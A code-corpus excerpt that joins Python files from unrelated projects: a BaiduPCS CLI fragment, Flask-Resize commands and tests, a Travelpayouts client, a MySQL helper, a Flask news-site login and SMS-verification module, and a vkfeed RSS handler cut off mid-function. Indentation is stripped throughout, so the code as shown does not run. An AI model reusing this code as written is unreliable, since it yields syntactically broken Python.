def save(ctx, shared_url, remotedir, password, no_show_vcode):
"""保存其他用户分享的链接"""
assert not password or len(password) == 4, "`password` must be 4 letters"
api = _recent_api(ctx)
if not api:
return
pwd = _pwd(ctx)
remotedir = join_path(pwd, remotedir)
_share.save_shared(
api,
shared_url,
remotedir,
password=password,
show_vcode=not no_show_vcode,
)
# }}}
# Cloud
# {{{
@app.command()
@click.argument("task_urls", nargs=-1, type=str)
@click.argument("remotedir", nargs=1, type=str)
@click.pass_context
@handle_error
def add(ctx, task_urls, remotedir):
"""添加离线下载任务"""
api = _recent_api(ctx)
if not api:
return
pwd = _pwd(ctx)
remotedir = join_path(pwd, remotedir)
for url in task_urls:
_cloud.add_task(api, url, remotedir)
@app.command()
@click.argument("task_ids", nargs=-1, type=str)
@click.pass_context
@handle_error
def tasks(ctx, task_ids):
"""列出离线下载任务。也可列出给定id的任务"""
api = _recent_api(ctx)
if not api:
return
if not task_ids:
_cloud.list_tasks(api)
else:
_cloud.tasks(api, *task_ids)
@app.command()
@click.pass_context
@handle_error
def cleartasks(ctx):
"""清除已经下载完和下载失败的任务"""
api = _recent_api(ctx)
if not api:
return
_cloud.clear_tasks(api)
@app.command()
@click.argument("task_ids", nargs=-1, type=str)
@click.pass_context
@handle_error
def canceltasks(ctx, task_ids):
"""取消下载任务"""
api = _recent_api(ctx)
if not api:
return
for task_id in task_ids:
_cloud.cancel_task(api, task_id)
@app.command()
@click.option("--yes", is_flag=True, help="确定直接运行")
@click.pass_context
@handle_error
def purgetasks(ctx, yes):
"""删除所有离线下载任务"""
api = _recent_api(ctx)
if not api:
return
if not yes:
if not Confirm.ask("确定删除[i red]所有的[/i red]离线下载任务?", default=False):
return
_cloud.purge_all_tasks(api)
# }}}
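# Illustrative CLI sketch built from the commands and aliases defined above
# (paths are placeholders):
# $ BaiduPCS-Py useradd                          # prompts for bduss and cookies
# $ BaiduPCS-Py ls /remote/dir -R -S
# $ BaiduPCS-Py d /remote/dir/file.mp4 -o ./downloads -s 5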
``` |
{
"source": "jokerinteractive/Flask-Resize",
"score": 3
} |
#### File: Flask-Resize/flask_resize/bin.py
```python
import os
import argh
import flask_resize
config = flask_resize.configuration.Config.from_pyfile(
os.environ["FLASK_RESIZE_CONF"]
)
resize = flask_resize.make_resizer(config)
@argh.named("images")
def clear_images():
"""Delete all generated images from the storage backend"""
for filepath in resize.storage_backend.delete_tree(
resize.target_directory
):
yield filepath
@argh.named("cache")
def list_cache():
"""List all items found in cache"""
for key in resize.cache_store.all():
yield key
@argh.named("images")
def list_images():
"""List all generated images found in storage backend"""
for key in resize.storage_backend.list_tree(resize.target_directory):
yield key
@argh.named("cache")
def sync_cache():
"""
Syncs paths stored in the cache backend with what's in the storage backend
Useful when the storage backend destination is shared between multiple
environments. One use case is when one has synced generated imagery
from production into one's development environment (for example with
`aws s3 sync --delete s3://prod-bucket s3://my-dev-bucket`).
The cache can then be synced with what's been added/removed from the
bucket `my-dev-bucket`.
"""
generated_image_paths = set(
resize.storage_backend.list_tree(resize.target_directory)
)
cached_paths = set(resize.cache_store.all())
for path in cached_paths - generated_image_paths:
resize.cache_store.remove(path)
yield "Removed {}".format(path)
for path in generated_image_paths - cached_paths:
resize.cache_store.add(path)
yield "Added {}".format(path)
@argh.named("cache")
def clear_cache():
"""Clear the cache backend from generated images' paths"""
resize.cache_store.clear()
@argh.named("all")
def clear_all():
"""Clear both the cache and all generated images"""
clear_cache()
for filepath in clear_images():
yield filepath
@argh.arg("-f", "--format")
@argh.arg("-F", "--fill")
def generate(
filename,
dimensions=None,
format=None,
quality=80,
fill=False,
bgcolor=None,
upscale=True,
progressive=True,
placeholder=False,
):
"""
Generate images passed in through stdin. Return URL for resulting image
Useful to generate images outside of the regular request/response cycle
of a web app = happier visitors who don't have to wait until image
processing by Flask-Resize completes. Care has to be taken so that the
exact same arguments are passed in as what is specified in
code/templates - the smallest difference in passed in options will cause
flask resize to generate a new image.
Use GNU Parallel or similar tool to parallelize the generation
"""
return resize(
filename,
dimensions=dimensions,
format=format,
quality=quality,
fill=fill,
bgcolor=bgcolor,
upscale=upscale,
progressive=progressive,
placeholder=placeholder,
)
parser = argh.ArghParser()
argh.add_commands(parser, [generate])
argh.add_commands(
parser,
[list_cache, list_images],
namespace="list",
title="Commands for listing images and cache",
)
argh.add_commands(
parser,
[sync_cache],
namespace="sync",
title="Commands for syncing data",
)
argh.add_commands(
parser,
[clear_cache, clear_images, clear_all],
namespace="clear",
title="Commands for clearing/deleting images and cache",
)
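# Illustrative CLI sketch of the commands registered above (FLASK_RESIZE_CONF must point
# at a config file; the image path and dimensions are placeholders):
# $ FLASK_RESIZE_CONF=./flask-resize-conf.py flask-resize generate img.png --dimensions 100x100
# $ flask-resize list images
# $ flask-resize clear all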
```
#### File: Flask-Resize/tests/test_bin.py
```python
import os
import subprocess
import pytest
import flask_resize
from .decorators import requires_redis, slow
@pytest.fixture
def env(tmpdir, redis_cache):
basedir = tmpdir
conffile = tmpdir.join("flask-resize-conf.py")
conffile.write(
"""
RESIZE_URL = 'https://example.com'
RESIZE_ROOT = '{root}'
RESIZE_REDIS_HOST = '{redis_host}'
RESIZE_REDIS_KEY = '{cache_key}'
""".format(
root=str(basedir).replace("\\", "\\\\"),
redis_host=redis_cache._host,
cache_key=redis_cache.key,
).strip()
)
env = os.environ.copy()
# env = dict(PATH=os.environ['PATH'])
env.update(FLASK_RESIZE_CONF=str(conffile))
return env
def run(env, *args):
return subprocess.check_output(args, env=env).decode().splitlines()
@slow
def test_bin_usage(env):
assert "usage: flask-resize" in run(env, "flask-resize", "--help")[0]
@slow
def test_bin_list_images_empty(env):
assert run(env, "flask-resize", "list", "images") == []
@slow
def test_bin_list_has_images(
env, resizetarget_opts, image1_name, image1_data, image1_key
):
resize_target = flask_resize.ResizeTarget(**resizetarget_opts)
resize_target.image_store.save(image1_name, image1_data)
resize_target.generate()
assert run(env, "flask-resize", "list", "images") == [image1_key]
@requires_redis
@slow
def test_bin_list_cache_empty(env, redis_cache):
assert run(env, "flask-resize", "list", "cache") == []
@requires_redis
@slow
def test_bin_list_has_cache(env, redis_cache):
redis_cache.add("hello")
redis_cache.add("buh-bye")
assert set(run(env, "flask-resize", "list", "cache")) == {
"hello",
"buh-bye",
}
@slow
def test_bin_clear_images(env, resizetarget_opts, image1_name, image1_data):
resize_target = flask_resize.ResizeTarget(**resizetarget_opts)
resize_target.image_store.save(image1_name, image1_data)
resize_target.generate()
run(env, "flask-resize", "clear", "images")
assert run(env, "flask-resize", "list", "images") == []
@requires_redis
@slow
def test_bin_clear_cache(env, redis_cache):
redis_cache.add("foo bar")
assert run(env, "flask-resize", "clear", "cache") == []
@requires_redis
@slow
def test_bin_sync_cache(
env, resizetarget_opts, image1_name, image1_data, image1_key, redis_cache
):
resize_target = flask_resize.ResizeTarget(**resizetarget_opts)
resize_target.image_store.save(image1_name, image1_data)
resize_target.generate()
redis_cache.clear()
assert run(env, "flask-resize", "list", "cache") == []
run(env, "flask-resize", "sync", "cache")
assert run(env, "flask-resize", "list", "images") == [image1_key]
```
#### File: Flask-Resize/tests/test_resize.py
```python
import io
import re
import flask
import pytest
from PIL import Image
from flask_resize import cache, exc, resizing
from .base import create_resizeapp
from .decorators import requires_cairosvg, requires_no_cairosvg
def test_resizetarget_init(filestorage):
original_image_relative_url = "path/to/my/file.png"
target = resizing.ResizeTarget(
filestorage,
original_image_relative_url,
dimensions="100x50",
format="jpeg",
quality=80,
fill=False,
bgcolor=None,
upscale=True,
progressive=True,
use_placeholder=False,
cache_store=cache.NoopCache(),
)
assert target.name_hashing_method == "sha1"
assert target.target_directory == "resized-images"
assert target._get_generate_unique_key_args() == [
original_image_relative_url,
"JPEG",
80,
100,
50,
"",
"no-fill",
"upscale",
"",
]
assert (
target.unique_key
== "resized-images/e1/30/7a6b8f166778588914d5130bd92bcd7f20ca.jpg"
)
def test_resizetarget_generate(
resizetarget_opts, image1_data, image1_name, image1_key
):
resize_target = resizing.ResizeTarget(**resizetarget_opts)
assert resize_target.name_hashing_method == "sha1"
with pytest.raises(exc.CacheMiss):
resize_target.get_cached_path()
with pytest.raises(exc.ImageNotFoundError):
assert resize_target.get_path()
# Save original file
resize_target.image_store.save(image1_name, image1_data)
# Generate thumb
resize_target.generate()
assert resize_target.get_path() == image1_key
def test_resizetarget_generate_placeholder(resizetarget_opts, image1_data):
resize_target = resizing.ResizeTarget(**resizetarget_opts)
resize_target.use_placeholder = True
resize_target.generate()
assert re.match(r"^resized-images/.+\.jpg$", resize_target.get_path())
def test_resize_filter(tmpdir, image1_data, image2_data):
resize_url = "http://test.dev/"
file1 = tmpdir.join("file1.png")
file1.write_binary(image1_data)
file2 = tmpdir.join("file2.png")
file2.write_binary(image2_data)
file1_expected_url = (
resize_url
+ "resized-images/ac/17/b732cabcc4eeb783cd994d0e169665b3bb68.png"
)
file2_expected_url = (
resize_url
+ "resized-images/ad/d9/a8c8531825a56f58289087b1f892c5e1348f.png"
)
app = create_resizeapp(
RESIZE_URL=resize_url, RESIZE_ROOT=str(tmpdir), DEBUG=True
)
template = '<img src="{{ fn|resize("100x") }}">'
@app.route("/")
def start():
return flask.render_template_string(template, fn="file1.png")
with app.test_client() as c:
resp = c.get("/")
assert file1_expected_url in resp.get_data(True)
with app.test_request_context():
rendered = flask.render_template_string(template, fn="file2.png")
assert file2_expected_url in rendered
def test_fill_dimensions(tmpdir, image1_data, resizetarget_opts):
file1 = tmpdir.join("file1.png")
file1.write_binary(image1_data)
resizetarget_opts.update(
format="png",
source_image_relative_url="file1.png",
dimensions="300x400",
fill=True,
)
resize_target = resizing.ResizeTarget(**resizetarget_opts)
img_data = resize_target.generate()
generated_img = Image.open(io.BytesIO(img_data))
assert generated_img.width == 300
assert generated_img.height == 400
assert generated_img.getpixel((0, 0))[3] == 0 # Transparent
resizetarget_opts.update(dimensions="700x600")
resize_target = resizing.ResizeTarget(**resizetarget_opts)
img_data = resize_target.generate()
generated_img = Image.open(io.BytesIO(img_data))
assert generated_img.width == 700
assert generated_img.height == 600
assert generated_img.getpixel((0, 0))[3] == 0 # Transparent
SVG_DATA = """<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg
width="100px"
height="100px"
viewBox="0 0 100 100"
version="1.1"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink">
<defs></defs>
<rect
id="Rectangle"
fill="#000000"
x="0"
y="0"
width="100"
height="100"></rect>
</svg>"""
@requires_cairosvg
def test_svg_resize(tmpdir, resizetarget_opts):
svg_path = tmpdir.join("test.svg")
svg_path.write(SVG_DATA)
resizetarget_opts.update(
format="png",
source_image_relative_url="test.svg",
dimensions="50x50",
)
resize_target = resizing.ResizeTarget(**resizetarget_opts)
img_data = resize_target.generate()
img = Image.open(io.BytesIO(img_data))
assert img.width == 50
assert img.height == 50
expected = (0, 0, 0, 255)
assert img.getpixel((0, 0)) == expected
assert img.getpixel((49, 49)) == expected
@requires_no_cairosvg
def test_svg_resize_cairosvgimporterror(tmpdir, resizetarget_opts):
svg_path = tmpdir.join("test.svg")
svg_path.write("content")
resizetarget_opts.update(source_image_relative_url="test.svg")
resize_target = resizing.ResizeTarget(**resizetarget_opts)
with pytest.raises(exc.CairoSVGImportError):
resize_target.generate()
``` |
{
"source": "jokerinteractive/travelpayouts-python",
"score": 3
} |
#### File: travelpayouts-python/travelpayouts/client.py
```python
import functools
import requests
from urllib.parse import urlencode
from travelpayouts.exceptions import ApiError
class Client(object):
"""Performs requests to the Travel Payouts API."""
def __init__(self, token=None, marker=None):
"""
:param token: Travel Payouts API token
:type token: string
:param marker: The unique identifier of the affiliate
:type marker: string
"""
self.token = token
self.marker = marker
self.default_headers = {
'Accept': 'application/json',
'Accept-Encoding': 'gzip,deflate,sdch',
'Content-Type': 'application/json',
'X-Access-Token': self.token
}
def _get(self, url, params=None):
full_url = url + '?' + urlencode(params) if params else url
r = requests.get(full_url, headers=self.default_headers)
return r.json()
def _post(self, url, params=None, json=None):
full_url = url + '?' + urlencode(params) if params else url
r = requests.post(full_url, headers=self.default_headers, json=json)
if not r.ok:
raise ApiError(r.status_code, r.text)
return r.json()
from travelpayouts.common import whereami
from travelpayouts.common import countries
from travelpayouts.common import cities
from travelpayouts.common import airports
from travelpayouts.common import airlines
from travelpayouts.common import airlines_alliances
from travelpayouts.common import planes
from travelpayouts.common import routes
from travelpayouts.v2 import prices_latest
from travelpayouts.v2 import month_matrix
from travelpayouts.v2 import week_matrix
from travelpayouts.v2 import nearest_places_matrix
from travelpayouts.v1 import prices_cheap
from travelpayouts.v1 import prices_direct
from travelpayouts.v1 import prices_calendar
from travelpayouts.v1 import airline_directions
from travelpayouts.v1 import city_directions
from travelpayouts.flights import search
from travelpayouts.flights import search_results
from travelpayouts.flights import get_link
def make_api_method(func):
"""
Provides a single entry point for modifying all API methods.
For now this is limited to allowing the client object to be modified
with an `extra_params` keyword arg to each method, that is then used
as the params for each web service request.
Please note that this is an unsupported feature for advanced use only.
It's also currently incompatible with multiple threads, see GH #160.
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
args[0]._extra_params = kwargs.pop("extra_params", None)
result = func(*args, **kwargs)
try:
del args[0]._extra_params
except AttributeError:
pass
return result
return wrapper
Client.whereami = make_api_method(whereami)
Client.countries = make_api_method(countries)
Client.cities = make_api_method(cities)
Client.airports = make_api_method(airports)
Client.airlines = make_api_method(airlines)
Client.airlines_alliances = make_api_method(airlines_alliances)
Client.planes = make_api_method(planes)
Client.routes = make_api_method(routes)
Client.prices_latest = make_api_method(prices_latest)
Client.month_matrix = make_api_method(month_matrix)
Client.week_matrix = make_api_method(week_matrix)
Client.nearest_places_matrix = make_api_method(nearest_places_matrix)
Client.prices_cheap = make_api_method(prices_cheap)
Client.prices_direct = make_api_method(prices_direct)
Client.prices_calendar = make_api_method(prices_calendar)
Client.airline_directions = make_api_method(airline_directions)
Client.city_directions = make_api_method(city_directions)
Client.search = make_api_method(search)
Client.search_results = make_api_method(search_results)
Client.get_link = make_api_method(get_link)
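# Illustrative usage sketch (the token and marker values are placeholders,
# not real credentials):
# client = Client(token="YOUR_API_TOKEN", marker="123456")
# all_countries = client.countries()
# geo = client.whereami("8.8.8.8", locale="en")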
```
#### File: travelpayouts-python/travelpayouts/common.py
```python
BASE_URL = 'http://www.travelpayouts.com'
API_DATA_URL = 'http://api.travelpayouts.com/data'
def whereami(client, ip, locale='en', callback=None):
locale = locale if locale in ['en', 'ru', 'de', 'fr', 'it', 'pl', 'th'] else 'en'
params = {
'ip': ip,
'locale': locale
}
if callback:
params["callback"] = callback
return client._get(BASE_URL+"/whereami", params)
def countries(client):
"""Returns a file with a list of countries from the database.
:rtype: list of countries
"""
data = client._get(API_DATA_URL+"/countries.json")
return data
def cities(client):
"""Returns a file with a list of cities from the database.
:rtype: list of cities
"""
data = client._get(API_DATA_URL+"/cities.json")
return data
def airports(client):
"""Returns a file with a list of airports from the database.
:rtype: list of airports
"""
data = client._get(API_DATA_URL+"/airports.json")
return data
def airlines(client):
"""Returns a file with a list of airlines from the database.
:rtype: list of airlines
"""
data = client._get(API_DATA_URL+"/airlines.json")
return data
def airlines_alliances(client):
"""Returns a file with a list of alliances from the database.
:rtype: list of alliances
"""
data = client._get(API_DATA_URL+"/airlines_alliances.json")
return data
def planes(client):
"""Returns a file with a list of airplanes from the database.
:rtype: list of airplanes
"""
data = client._get(API_DATA_URL+"/planes.json")
return data
def routes(client):
"""Returns a file with a list of routes from the database.
:rtype: list of routes
"""
data = client._get(API_DATA_URL+"/routes.json")
return data
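# --- Editor's illustrative usage sketch (not part of the original module) ---
# Assumes a travelpayouts Client configured elsewhere with a valid API token;
# the constructor arguments and response fields are assumptions, not taken from this file.
# client = travelpayouts.Client(token='YOUR_TOKEN')
# client.whereami('8.8.8.8')   # geolocate an IP address
# client.countries()           # list of country dicts
# client.airlines()            # list of airline dicts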
```
#### File: travelpayouts-python/travelpayouts/v1.py
```python
import travelpayouts.exceptions
API_V1_URL = 'http://api.travelpayouts.com/v1'
def prices_cheap(client):
pass
def prices_direct(client):
pass
def prices_calendar(client):
pass
def airline_directions(client):
pass
def city_directions(client):
pass
``` |
{
"source": "Joker-Jerome/consistency-checks",
"score": 3
} |
#### File: consistency-checks/db/mysql.py
```python
import pymysql
from contextlib import contextmanager
@contextmanager
def mysql_db_connection(cursor_factory=None):
try:
from config import db_config
db = db_config()
con = pymysql.connect(user=db['user'],
db=db['database'],
host=db['host'],
password=db['password'] if db['password'] is not None else '',
port=int(db['port']),
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor)
if cursor_factory is not None:
cur = con.cursor(cursor=cursor_factory)
else:
cur = con.cursor()
except pymysql.Error as err:
yield None, None, err
else:
try:
yield con, cur, None
finally:
cur.close()
con.close()
def execute_mysql_query(query: str) -> float:
with mysql_db_connection() as (_, cursor, _):
cursor.execute(query)
result = cursor.fetchone()
return float(list(result.values())[0])
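# --- Editor's illustrative usage sketch (not part of the original file) ---
# Assumes config.db_config() points at a reachable MySQL instance and that a
# table named `orders` exists; both are assumptions made only for illustration.
if __name__ == '__main__':
    # run a scalar query and print the single numeric result
    print(execute_mysql_query("SELECT COUNT(*) FROM orders"))
    # the context manager can also be used directly, with explicit error handling
    with mysql_db_connection() as (con, cur, err):
        if err is None:
            cur.execute("SELECT 1")
            print(cur.fetchone())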
``` |
{
"source": "Joker-L0912/Tms-GCN-Py",
"score": 2
} |
#### File: callbacks/base/best_epoch.py
```python
import copy
import numpy as np
import torch
from pytorch_lightning.utilities import rank_zero_warn
from pytorch_lightning.callbacks import Callback
class BestEpochCallback(Callback):
TORCH_INF = torch_inf = torch.tensor(np.Inf)
MODE_DICT = {
"min": (torch_inf, "min"),
"max": (-torch_inf, "max"),
# "max": (100, "max"),
}
MONITOR_OP_DICT = {"min": torch.lt, "max": torch.gt}
def __init__(self, monitor="", mode="min"):
super(BestEpochCallback, self).__init__()
self.monitor = monitor
self.__init_monitor_mode(monitor, mode)
self.best_epoch = 0
def __init_monitor_mode(self, monitor, mode):
if mode not in self.MODE_DICT and mode != "auto":
rank_zero_warn(
f"PrintBestEpochMetrics mode {mode} is unknown, fallback to auto mode",
RuntimeWarning,
)
mode = "auto"
if mode == "auto":
rank_zero_warn(
"mode='auto' is deprecated in v1.1 and will be removed in v1.3."
" Default value for mode with be 'min' in v1.3.",
DeprecationWarning,
)
self.MODE_DICT["auto"] = (
(-self.TORCH_INF, "max")
if monitor is not None and ("acc" in monitor or monitor.startswith("fmeasure"))
else (self.TORCH_INF, "min")
)
self.best_value, self.mode = self.MODE_DICT[mode]
def on_validation_batch_end(self, trainer, pl_module, outputs, batch, batch_idx, dataloader_idx):
if (trainer.current_epoch + 1) % trainer.check_val_every_n_epoch != 0:
return
monitor_op = self.MONITOR_OP_DICT[self.mode]
metrics_dict = copy.copy(trainer.callback_metrics)
monitor_value = metrics_dict.get(self.monitor, self.best_value)
if monitor_op(monitor_value.type_as(self.best_value), self.best_value):
self.best_value = monitor_value
self.best_epoch = trainer.current_epoch
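# --- Editor's illustrative usage sketch (not part of the original file) ---
# Assumes a LightningModule `model` and its dataloaders exist elsewhere, and that a
# metric named "val_loss" is logged during validation; those names are assumptions.
# import pytorch_lightning as pl
# best_cb = BestEpochCallback(monitor="val_loss", mode="min")
# trainer = pl.Trainer(max_epochs=20, callbacks=[best_cb])
# trainer.fit(model)
# print(best_cb.best_epoch, best_cb.best_value)  # epoch index and value of the best metric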
``` |
{
"source": "jokerLiz/flask_news_info",
"score": 2
} |
#### File: modules/passport/views.py
```python
from . import passport_blue
from flask import request, jsonify, current_app, make_response, json, session
from newsInfo.utils.response_code import RET # template used for building responses
from newsInfo.utils.captcha.captcha import captcha # image captcha toolkit
from ... import redis_store, constants
import random
import re
from newsInfo.libs.yuntongxun.sms import CCP # CCP from the Yuntongxun cloud SMS package
from newsInfo.models import User # the User model (user table)
from newsInfo import db # the database object db
from datetime import datetime
'''Image captcha'''
# Feature: image captcha
# Request URL: /passport/image_code?cur_id=xxx&pre_id=xxx
# Request method: GET
# Request params: random string (uuid) cur_id, previous string: pre_id
# Returns: the captcha image
@passport_blue.route('/image_code')
def get_image_code():
'''
Approach:
1. Get the parameters
2. Validate the parameters (check that they exist)
3. Generate the captcha with the captcha toolkit
4. Save it to redis
5. Return the captcha image data
:return:
'''
# 1. Get the query-string parameters carried by the GET request
cur_id = request.args.get('cur_id')
pre_id = request.args.get('pre_id')
# 2. Validate the parameters
if not cur_id:
return jsonify(errno = RET.PARAMERR,errmsg='参数不全')
# 3. Generate the image captcha
try:
# get the captcha image data
name,text,image_data = captcha.generate_captcha()
# save it to redis
'''
arg 1: the redis key --- the image id
arg 2: the value for that key --- the captcha text
arg 3: expiration time
'''
redis_store.set('image_code:%s'%cur_id,text,constants.IMAGE_CODE_REDIS_EXPIRES)
# check whether there is a previous image id
if pre_id:
# release the captcha stored under that id
redis_store.delete('image_code:%s'%pre_id)
except Exception as e:
current_app.logger.error(e)
return jsonify(errno = RET.DBERR,errmsg='验证码操作失败')
# return the captcha image data
response = make_response(image_data) # raw image bytes
# change the response header to an image content type
response.headers['Content-Type'] = 'image/jpg'
return response
'''SMS verification code'''
# Feature: send an SMS verification code
# Request URL: /passport/sms_code
# Request method: POST
# Request params: mobile,image_code,image_code_id
# Param format: JSON
# Returns: errno,errmsg
@passport_blue.route('/sms_code',methods=['POST'])
def get_sms_code():
'''
Approach:
1. Get the parameters
2. Validate the parameters (presence and format checks)
3. Fetch the image captcha from redis
4. Check whether the image captcha has expired
5. Delete the stored image captcha
6. Check that the image captcha is correct
7. Generate the SMS verification code
8. Send the SMS
9. Check whether sending succeeded
10. Save the SMS code to redis
11. Return the response
:return:
'''
# 1. Get the parameters
json_data = request.data
dict_data = json.loads(json_data) # convert the JSON payload into a dict
mobile = dict_data.get('mobile') # the three parameters sent by the front end
image_code = dict_data.get('image_code')
image_code_id = dict_data.get('image_code_id')
# 2. Validate the parameters
if not all([mobile,image_code,image_code_id]): # some parameter is missing
return jsonify(errno=RET.PARAMERR,errmsg='参数不足')
if not re.match('1[3579]\d{9}',mobile): # invalid mobile number format
return jsonify(errno=RET.PARAMERR,errmsg='手机格式不正确')
# 3. Fetch the image captcha from redis
try:
redis_image_code = redis_store.get('image_code:%s'%image_code_id)
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=RET.DBERR,errmsg='数据获取失败')
# 4. Check whether the captcha fetched above has expired
if not redis_image_code:
return jsonify(errno=RET.NODATA, errmsg="图片验证码过期")
# 5. Delete the image captcha from redis so it can only be used once
try:
redis_store.delete('image_code:%s'%image_code_id)
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=RET.DBERR, errmsg="删除图片验证码失败")
# 6. Check that the image captcha is correct
if image_code.upper() != redis_image_code.upper():
return jsonify(errno=RET.DATAERR,errmsg='图片验证码错误')
# 7. Generate the SMS verification code
sms_code = '%06d'%random.randint(0,999999)
current_app.logger.debug(f'短信验证码:{sms_code}')
# 8. Send the verification SMS
try:
ccp = CCP()
# Note: the test SMS template id is 1
# arg 1: the recipient's mobile number
# arg 2: ['content', validity period in minutes]
# arg 3: template id 1 -- "[Yuntongxun] You are using the Yuntongxun SMS template, your verification code is {1}, please enter it within {2} minutes"
result = ccp.send_template_sms(mobile, [sms_code, constants.SMS_CODE_REDIS_EXPIRES/60], 1)
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=RET.THIRDERR, errmsg="云通讯发送失败")
# 9. Check whether the SMS was sent successfully
if result == -1:
return jsonify(errno=RET.DATAERR , errmsg="发送短信失败")
# 10. Save the verification code to redis
try:
redis_store.set('sms_code:%s'%mobile,sms_code,constants.SMS_CODE_REDIS_EXPIRES)
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=RET.DBERR, errmsg="短信保存失败")
# 11. Return the response
return jsonify(errno=RET.OK,errmsg='发送成功')
'''Registration feature'''
# Feature: register
# Request URL: /passport/register
# Request method: POST
# Request params: mobile,sms_code,password
# Param format: JSON
# Returns: errno,errmsg
@passport_blue.route('/register',methods=['POST'])
def register():
'''
1. Get the parameters
2. Validate the parameters
3. Fetch the SMS code from redis by mobile number
4. Check whether the SMS code has expired
5. Delete the SMS code from redis
6. Check that the code is correct
7. Create the user object
8. Set the user attributes
9. Save to the database
10. Return a success response
:return:
'''
# 1. Get the parameters
# json_data = request.data
# dict_data = json.loads(json_data) # convert the JSON payload into a dict
# the two lines above are equivalent to the single line below
dict_data = request.json
mobile = dict_data.get('mobile')
sms_code = dict_data.get('sms_code')
password = dict_data.get('password')
# 2. Validate the parameters
if not all([mobile,sms_code,password]):
return jsonify(errno=RET.PARAMERR,errmsg='参数不全')
# 3. Fetch the SMS code from redis by mobile number
try:
redis_sms_code = redis_store.get('sms_code:%s' % mobile)
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=RET.DBERR, errmsg='数据获取失败')
# 4. Check whether the SMS code has expired
if not redis_sms_code:
return jsonify(errno=RET.NODATA, errmsg='验证码过期')
# 5. Delete the SMS code from redis
try:
redis_store.delete('sms_code:%s' % mobile)
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=RET.DBERR, errmsg='删除短信验证码错误')
# 6. Check that the code is correct
if sms_code != redis_sms_code:
return jsonify(errno=RET.DATAERR, errmsg='验证码错误')
'''
7. Create the user object
8. Set the user attributes
9. Save to the database
10. Return a success response
'''
# 7. Create the user object
user = User()
# 8. Set the user attributes
user.nick_name = mobile
user.password = password
user.mobile = mobile
# 9. Save to the database
try:
db.session.add(user)
db.session.commit()
except Exception as e:
current_app.logger.error(e)
db.session.rollback()
return jsonify(errno=RET.DBERR, errmsg='提交数据库错误')
# 10. Return a success response
return jsonify(errno=RET.OK,errmsg='注册成功')
'''Login feature'''
# 1. Get the parameters
# 2. Validate
# 3. Get the user object by mobile number
# 4. Check whether the user exists
# 5. Check the password
# 6. Save the user info in the session
# 7. Return the response
@passport_blue.route('/login',methods=['POST'])
def login():
'''
1. Get the parameters
2. Validate the parameters
3. Get the user object by mobile number
4. Check whether the user exists
5. Check whether the password is correct
6. Save the user in the session
7. Return the response
:return:
'''
# 1. Get the parameters
mobile = request.json.get('mobile')
password = request.json.get('password')
# 2. Validate the parameters
if not all([mobile,password]):
return jsonify(errno=RET.NODATA,errmsg='参数不足')
if not re.match('1[3579]\d{9}',mobile): # invalid mobile number format
return jsonify(errno=RET.PARAMERR,errmsg='手机格式不正确')
# 3. Get the user object by mobile number
try:
user = User.query.filter_by(mobile=mobile).first()
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=RET.DBERR, errmsg='查询用户失败')
# 4. Check whether the user exists
if not user:
return jsonify(errno=RET.NODATA, errmsg='该用户未注册')
# 5. Check whether the password is correct
if not user.check_passowrd(password):
return jsonify(errno=RET.DATAERR, errmsg='密码错误')
# 6. Save the user in the session
session['user_id'] = user.id
session['mobile'] = mobile
session['nick_name'] = user.nick_name
user.last_login = datetime.now()
# 7. Return the response
current_app.logger.debug('登陆成功') # write a log entry
return jsonify(errno=RET.OK, errmsg='登录成功')
'''Logout'''
@passport_blue.route('/logout',methods=['POST'])
def logout():
# clear the session data
session.pop('user_id',None)
session.pop('mobile', None)
session.pop('nick_name', None)
return jsonify(errno=RET.OK,errmsg='OK')
```
#### File: newsInfo/utils/common.py
```python
def do_index_class(index):
if index ==1:
return 'first'
elif index == 2:
return 'second'
elif index == 3:
return 'third'
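# --- Editor's note (assumption, not from this file) ---
# do_index_class is presumably registered as a Jinja2 template filter, e.g.
# app.add_template_filter(do_index_class, 'index_class'), so templates can style
# the top three news items differently; indices beyond 3 implicitly return None.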
``` |
{
"source": "JOKERMAX89/vkfeed",
"score": 2
} |
#### File: vkfeed/PyRSS2Gen/setup.py
```python
import os
from setuptools import setup, find_packages
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
import PyRSS2Gen
from distutils.core import setup
setup(name = "PyRSS2Gen",
version = ".".join(map(str, PyRSS2Gen.__version__)),
url ='http://www.dalkescientific.com/Python/PyRSS2Gen.html',
license = 'BSD',
description = 'A Python library for generating RSS 2.0 feeds.',
long_description = read('README'),
author = '<NAME>',
author_email = '<EMAIL>',
maintainer_email = '<EMAIL>',
packages = find_packages('.'),
package_dir = {'':'.'},
install_requires = ['setuptools'],
classifiers = [
'Development Status :: 5 - Production/Stable',
'Programming Language :: Python :: 2.3',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP',
],
py_modules = ['PyRSS2Gen', 'test', 'example']
)
```
#### File: vkfeed/pages/wall.py
```python
from __future__ import unicode_literals
import cgi
import datetime
import httplib
import logging
import time
import webapp2
from PyRSS2Gen import PyRSS2Gen
from vkfeed import constants
from vkfeed.core import Error
import vkfeed.utils
LOG = logging.getLogger(__name__)
class WallPage(webapp2.RequestHandler):
'''Generates an RSS feed.'''
def get(self, profile_name):
'''Processes the request.
We don't use VKontakte API because it requires authorization and gives
tokens with expiration time which is not suitable for RSS generator.
'''
headers = self.__get_headers()
user_agent = headers.get('user-agent', '').strip()
if user_agent and (
# Google Reader bot still crawls the Web. Reject it to save
# bandwidth.
user_agent.startswith('Feedfetcher-Google;') or
# FeedNotifier updates feeds every minute
user_agent.startswith('FeedNotifier/') or
# YandexBlogs bot sends a lot of requests (2/minute) for some
# feeds. The support doesn't respond adequately.
'YandexBlogs' in user_agent
):
self.error(httplib.FORBIDDEN)
return
user_error = None
http_status = httplib.OK
unknown_user_error = False
try:
show_photo = ( self.request.get('show_photo', '1') != '0' )
foreign_posts = ( self.request.get('foreign_posts', '0') != '0' )
hash_tag_title = ( self.request.get('hash_tag_title', '0') != '0' )
